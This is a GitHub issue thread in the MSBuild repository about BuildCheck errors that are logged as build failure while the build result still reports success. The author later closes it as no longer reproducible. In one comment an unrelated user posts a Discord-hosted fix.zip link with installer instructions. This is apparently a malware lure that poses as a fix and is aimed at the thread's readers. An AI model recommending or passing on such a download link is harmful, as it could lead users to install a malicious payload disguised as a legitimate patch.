### ISSUE TITLE
On BuildCheck exception MSBuild logs build failure but return true on buildResult

### ISSUE THREAD

**Issue by maridematte** [dotnet/msbuild#10610]
When there is an exception or error logged by BuildCheck, MSBuild shows on the command line and logs it as Build Failed. But at the end, the bool for build success returns true, so build successful.

This seems to be caused by the logging override here: https://github.com/dotnet/msbuild/blob/7cf66090a764f0f239671e4877255efe7ba91155/src/Build/BackEnd/BuildManager/BuildManager.cs#L1042-L1043 not being synchronized with the final build result: https://github.com/dotnet/msbuild/blob/7cf66090a764f0f239671e4877255efe7ba91155/src/MSBuild/XMake.cs#L1627

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by maridematte** [comment]
I'm unable to repro this anymore. Maybe something changed within the logging structure of BuildCheck in the recent months that fixed this issue.
